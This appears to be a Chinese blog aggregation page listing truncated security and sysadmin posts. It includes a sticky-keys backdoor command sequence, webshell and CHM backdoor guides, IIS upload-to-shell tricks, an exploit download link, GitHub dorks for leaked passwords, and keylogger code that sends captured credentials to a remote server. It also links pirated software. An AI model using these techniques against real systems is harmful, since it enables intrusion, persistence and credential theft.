linux、渗透测试、网络安全、CTF、windows

【代码审计】常见WEB漏洞代码层原理分析及利用方式——SQL注入篇

Sw1t0range:

1.SQL注入




1.1 普通注入


  普通注入分为int型和string型,在string型注入中需要使用单或双引号闭合。



1.1.1 整型注入


  测试代码:


<?php
header("Content-type:text/html;charset=utf-8"); 
$uid = $_GET['id']; 
$sql = "select * from test where...

+

完美扫描PHP特殊一句话后门

Seventeen.:

<?php


/**********************


网上公布的各种PHP后门全军覆没


针对一些特殊变形的后门需要自己添加特征


误报率不到百分之一


**********************/error_reporting(E_ERROR);ini_set('max_execution_time',20000);ini_set('memory_limit','512M');header("content-Type: text/html; charset=gb2312");$matches...

+

如何制作中国菜刀三百万后门箱子

☯KK | 补丁君:

    相信各位都看过这篇中国菜刀仿冒官网三百万箱子爆菊记,肯定会有人像我一样想过:那么这个菜刀后门箱子该怎么制作呢?所以下面就来介绍介绍了~


    首先,这个后门存在于菜刀的db.tmp中,用WinHex载入就能找到



    这个是我修改过后的,用于本地做测试用


    我们都知道,通常对软件后门的检测都是通过抓包来检验的,但这个后门却可以绕过多数抓包软件:...



+

shift后门建立与利用

走过岁月......:

后门建立方法一


把 c:\windows\system32\sethc.exe 和 c:\windows\system32\dllcache\sethc.exe 两个文件全部改成 baksethc.exe



move c:\windows\system32\sethc.exe c:\windows\system32\sethc-bak.exe


copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe


copy c:\windows\system32...

+

高级组合技打造“完美” 捆绑后门

CanMeng'Blog - 一个WEB安全的技术爱好者:

0x01 CHM 简介


在介绍怎么使用CHM来作为后门之前,首先要知道CMH是什么东西。
CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,并可以通过URL与Internet联系在一起。因为使用方便,形式多样也被采用作为...

+

linux 开启独立iptables日志

你的话是我脚前的灯,路上的光。:

系统日志配置在CentOS5上叫syslog,而在CentOS6上叫rsyslog,叫增强版的syslog,CentOS5上的配置文件在/etc/syslog.conf下,而CentOS6在/etc/rsyslog.conf下



1. 在rsyslog.conf 添加配置


 /etc/rsyslog.conf中添加不同的日志级别(默认warn(=4))


kern.warning     /var/log/iptables.log...

+

<Python> 自动化运维常用模块实用实例笔记

Sw1t0range:

psutil    系统基础信息模块


    


psutil.users()                # 返回当前登录系统的所有用户信息(用户名,IP及登录时间)


pstuil.boot_time()        

+

windows下cmd命令行下管理防火墙firewall

windows下通过图形化界面管理防火墙firewall也是可以的,但是在有些时候这是不方便的,比如需要批量添加防火墙规则时,通过图像化界面就比较麻烦了。如果可以像linux下一样可以通过cmd下的命令来执行的话就可以比较方便了。同在在渗透测试或肉鸡上使用也是比较方便的。

一下命令必须是管理员权限

一、防火墙的开启和关闭

netsh firewall set opmode mode=disable

关闭防火墙

netsh firewall set opmode mode=enable

开启防火墙

二、防护墙规则和配置信息的查看

netsh advfirewall firewall

+

兼容各大浏览器的插件开发

DistChen:

        在各种浏览器中,有ActiveX、Plugin、Extension、AddOn这几种名词,虽然看起来貌似都是一类,但其实是有本质区别的:Activex、Plugin可以脱离浏览器而独立存在,而Extension、AddOn 是依附于浏览器的。可以这么说,Activex、Plugin 就相当于是本地应用程序,通过注册一些文件,可以将这种类型的应用程序嵌入到网页中(与 java applet 又有区别)。Extension、AddOn 是基于浏览器提供的...

+

16/06/15分享:Python自动化开发基础编程视频破解版17天课程完整版 共254集

颖奇L'AMORE - iSafe Team:

颖奇L'AMORE


坚持分享优质资源,鄙视收费


-------------------------------------------



├─01-Python自动化开发基础 Day1 语言基础流程控制
│      01 python s8day1 开课介绍.mp4
│      02 python s8day1 学生介绍.mp4
│      03 python...

+

代码审计入门总结

ch7ss's Blog:

0x00 简介


之前看了seay写的PHP代码审计的书,全部浏览了一遍,作为一个代码审计小白,希望向一些和我一样的小白的人提供一下我的收获,以及一个整体的框架和常见漏洞函数。这也算是这本书的一个学习笔记吧,可以结合我捋顺的思路来看这本书。: )

0x01 整体

学习代码审计的目标是能够独立完成对一个CMS的代码安全监测。其通用的思路有:



  • 通读全文代码,从功能函数代码开始阅读,例如include文件夹下的common_fun.php,或者有类似关键字的文件。


  • 看配置文件,带有config...

+

WEBSHELL提权神器——MS15-015

Freed0m_:

漏洞通杀2008 r2/2012/2012 r2以及win7/win8/win8.1。


由于是逻辑漏洞,无论如何都不可能蓝屏,同时也没有32位64位一说,一个exe通吃。





下载地址http://pan.lanzou.com/380573


From T00LS zcgonvh

+

解析漏洞总结

New0'Blog:

一、IIS 5.x/6.0解析漏洞


IIS 6.0解析利用方法有两种


1.目录解析

/xx.asp/xx.jpg

2.文件解析

xx.asp;.jpg

第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。


例如创建目录 xx.asp,那么

/xx.asp/1.jpg

将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。


第二种,在IIS6.0下,分号后面的...

+

记一次Windows下突破PHP上传的实验

☯KK | I AM KK:


本地环境:nginx/1.6.2+PHP/5.3.29


OS:Windows


实验代码:


upfile.html



<html>
<body>
<form method="post" action="upfile.php" enctype="multipart/form-data">
<input type="file" name="file" value="...

+

虚拟机添加新硬盘之linux系统篇

牛吧CIO:

原地址http://jingyan.baidu.com/article/624e7459a3a0e334e8ba5aba.html



  1. 在需要添加的系统点设置——增加——硬盘。然后继续一路next把硬盘建立保存好。



  2. 磁盘管理。这里说两种添加的方法,扩容到一个卷单独挂载




  • 扩容到一个卷



把可用的硬盘空间,全部扩充到一个硬盘下,这样的好处就是,硬盘的空间可以利用起来,但坏处就是如果此硬盘分区出问题,就会导致硬盘分区损坏,可能在损坏下的数据就无法恢复了。...



+

使用pyinstaller打包的坑

洛基的城堡:

项目中用到pyinstaller将python打成.exe可执行文件:


结果发现如下问题:


由于需要获取命令执行的状态值及返回信息,因此放弃了os.system,os.popen等,commands.getstatusoutput在windows平台也不能使用,因此选择subprocess模块。 os.system还有个坑,当cmd有多个引号时,会解析cmd失败。


1.subprocess.Popen调用报异常:


当使用pyinstaller打成.exe文件安装后


使用p = subprocess.Popen(cmd, shell...

+

Github文件泄露搜索语法

使用与利用GitHub

☯MR.K's Blog—关注Web安全~:

邮件信息:
site:Github.com smtp
site:Github.com smtp @qq.com
site:Github.com smtp @126.com
site:Github.com smtp @163.com
site:Github.com smtp @sina.com.cn
site:Github.com smtp password
site:Github.com String password smtp
……



结合厂商域名,灵活运用:
site:Github.com smtp @厂商域名...


+

点击163的超级连接自动登陆163

场景一:从本地一个html文件编辑一个超链,点击连接实现登陆。等同于直接把链接放到地址栏中回车登陆。html实例代码如下:

<html>
<body>
<a href="#" onclick="window.open('http://reg.163.com/CheckUser.jsp?username=aaaa@163.com&password=123456')">163</a>
</body>
</html>

以上代码是可以直接登陆的。

场景二:

从你自己的网站中的一个链接,点...

+

当XSS遇上CSRF

M0L0K's Blog—关注网络安全与渗透测试~:

今天我们来介绍一个场景,当xss遇上csrf的时候,是否能打出一套漂亮的组合技能。

实验环境:
     ZvulDirll[请用下面我简单修改过的版本]
     下载地址:链接: http://pan.baidu.com/s/1kUwQ6R9 密码: 92tc

一、安装:
0x00:解压ZVulDrill压缩包,将其放在www目录下,也就是你的网站根目录。
0x01、编辑ZVulDrill\sys\config.php中的数据库账号...

+

关于防火长城的DNS服务污染的看法

今天由于使用VPN的关系,需求是:一切都走国内线路,如果国内访问不了的自动使用VPN线路访问。最好是可以判断哪个线路好就是用那个线路。

查找好多的资料与信息都没有找到,一款合适的软件。就想着自己来实现这个功能。

首先是DNS解析,本来认为是被墙的网站不会返回IP地址,但是经过使用nslookup发现可以返回IP,但是这个IP是错误的IP(被污染了)。通过访问返回的IP,不能正确的打开facebook.com,但是通过VPN在nslookup返回的IP,就可以正确访问facebook.com。这充分说明dns被污染了。如下图:


本来觉得没什么,但是细看就会发...

+

WEBSHELL提权神器——MS15-015

Freed0m_:

漏洞通杀2008 r2/2012/2012 r2以及win7/win8/win8.1。


由于是逻辑漏洞,无论如何都不可能蓝屏,同时也没有32位64位一说,一个exe通吃。





下载地址http://pan.lanzou.com/380573


From T00LS zcgonvh

+

合理设置apache的连接数及进程工作方式

你的话是我脚前的灯,路上的光。:

网站在线人数增多,访问时很慢。初步认为是服务器资源不足了,但经反复测试,一旦连接上,不断点击同一个页面上不同的链接,都能迅速打开,这种现象就是说明apache最大连接数已经满了,新的访客只能排队等待有空闲的链接,而如果一旦连接上,在keeyalive 的存活时间内(KeepAliveTimeout,默认5秒)都不用重新打开连接,因此解决的方法就是加大apache的最大连接数。

1.在哪里设置
服务器的为FreeBSD 6.2 ,apache 2.24,使用默认配置(FreeBSD 默认不加载自定义MPM配置),默认最大连接数是250
在/usr/local/...

+

Smtp发送带附件的邮件

#coding:utf-8
'''
发送带附件的邮件
'''
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

import smtplib
msg=MIMEMultipart()
att1 = MIMEText(open('1.txt','rb').read(),'base64','utf-8')
att1["Content-Type"] = 'application/octet-stream'
att1["Content-Disposition...

+

代码审计之--本地包含漏洞找寻特点

男渗鹏鹏 Blog's:

web 2.0时代可谓是带火了SQL
injection的攻击。但是根据调查显示,随着注入工具的功能复杂完善和傻瓜化,几乎人人都能用工具完成从注入到后台这一步骤。不过一些大型站点显然
不是那么容易出现注入点的。现在很多人越来越多的注意到了网站文件包含和XSS CSRF上面,道理很简单,目前这两种安全问题管理员没有太多的重视。
可实际上这两种安全问题哪一种都不能忽视。几天来分析一下文件包含(File Include)中的本地包含。
很简单的一篇文章,但愿能给你带来收获:
网站本地包含漏洞找寻特点,代码浅分析,与修补建议
作者:YoCo Smart
来自:Silic Group...

+

走过岁月......:

代码审计

代码审计关键点,审计工具等

+

使用pyHook实现的键盘记录器

from ctypes import *
import pythoncom
import pyHook
import win32clipboard

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None

def get_current_process():
hwnd = user32.GetForegroundWindow()#获得前台窗口的句柄
#获得进程ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd,byref(...

+

Python学习之路(1)--小试PIL

史丹利复合田:

PILhttp://www.pythonware.com/products/pil/是一个python的图像库,用来处理图像十分方便


这次的程序十分简单,读取一个目录,将其里面所有图片都转换成不大于iPhone6屏幕分辨率的大小,并保存。


main.py



# coding=gbk


#你有一个目录,装了很多照片,把它们的尺寸变成都不大于 iPhone6 分辨率的大小。1334(高) x 750(宽)


from __future__ import print_function


from...

+

利用pyHook截取人人登陆密码

#!/usr/bin/env python

# -*- coding: utf-8 -*-

import pythoncom

import pyHook

import time

from PIL import ImageGrab

import socket 

def send_msg_to_remote(msg):

    '''

    Function:向远程服务器发送信息

    Input:even


+

pyhooks实现键盘监控学习心得

# -*- coding: utf8 -*-
import pythoncom
import pyHook
import time
import win32api
t=''
asciistr=''
keystr=''
def onKeyboardEvent(event):
global t,asciistr,keystr
filename='d://test.txt'
wrfile=open(filename,'ab')
"处理键盘事件"
if t==str(event.WindowName):
asciistr=asciistr+chr(event.Ascii)
keystr=keystr...

+

【软件】VMware v12.1.0 简体中文精简特别版

MT小辉-网络资源站-game520.lofter.com:

热门虚拟机软件VMware Workstation 日前更新至v12.1,现在VMware v12.1 简体中文精简特别版有啦!该版集成SLIC2.3、MSDM、OSX改了EFI BIOS,集成许可证密钥安装完自动永久激活!另外,该版本最大特色是添加了DELL SLIC 2.3,号称世界史上第一位解决!喜欢精简版的朋友不容错过!



该版本精简内容:
1、VMware Tray
2、VMware vmx-debug
3、VMware VIX
4、Visual Studio
5、VC Runtimes Redist...

+

© redboy | Powered by LOFTER